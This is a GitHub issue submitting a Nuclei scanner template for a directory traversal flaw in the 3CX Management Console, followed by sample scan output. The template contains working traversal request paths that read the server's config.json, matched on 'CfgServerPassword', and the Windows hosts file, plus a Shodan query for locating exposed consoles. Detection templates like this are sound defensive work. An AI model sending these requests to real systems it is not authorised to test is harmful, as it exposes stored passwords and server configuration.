### ISSUE TITLE
3cx-management-console LFI

### ISSUE THREAD

**Issue by random-robbie** [projectdiscovery/nuclei-templates#4025]
```yaml
id: 3cx-management-console

info:
  name: 3CX Management Console - Directory Traversal
  author: random-robbie
  severity: high
  description: Directory traversal vulnerability on 3CX Management Console.
  metadata:
    shoda-query: http.title:"3CX Phone System Management Console"
  reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
  tags: 3cx,lfi,voip

requests:
  - method: GET
    path:
      - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
      - '{{BaseURL}}/Electron/download/windows/C:drivers\etc\hosts'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "CfgServerPassword"
          - "acme"
        part: body
 ```

```
[2022-03-31 11:41:46] [3cx-management-console] [http] [high] https://localhost/Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json
[2022-03-31 11:41:47] [3cx-management-console] [http] [high] https://localhost/Electron/download/windows/C:drivers%5Cetc%5Chosts
```
